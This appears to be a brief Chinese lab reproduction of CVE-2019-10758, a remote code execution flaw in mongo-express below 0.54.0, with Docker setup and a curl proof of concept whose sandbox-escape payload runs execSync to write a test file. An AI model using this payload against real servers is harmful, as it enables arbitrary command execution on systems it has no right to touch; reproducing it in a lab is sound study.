CVE-2019-10758 Mongo-express远程代码执行复现
Mongo-express是MongoDB的数据库管理工具。
影响版本
mongo-express < 0.54.0
环境搭建
使用docker搭建环境
浏览器访问8081端口,看到Mongo-express界面
复现漏洞
利用poc
curl 'http://127.0.0.1:8081/checkValid' -H 'Authorization: Basic YWRtaW46cGFzcw==' --data 'document=this.constructor.constructor("return process")().mainModule.require("child_process").execSync("echo Str1am > cve-2019-10758.txt")'
看到返回Valid,查看创建的文件
创建成功。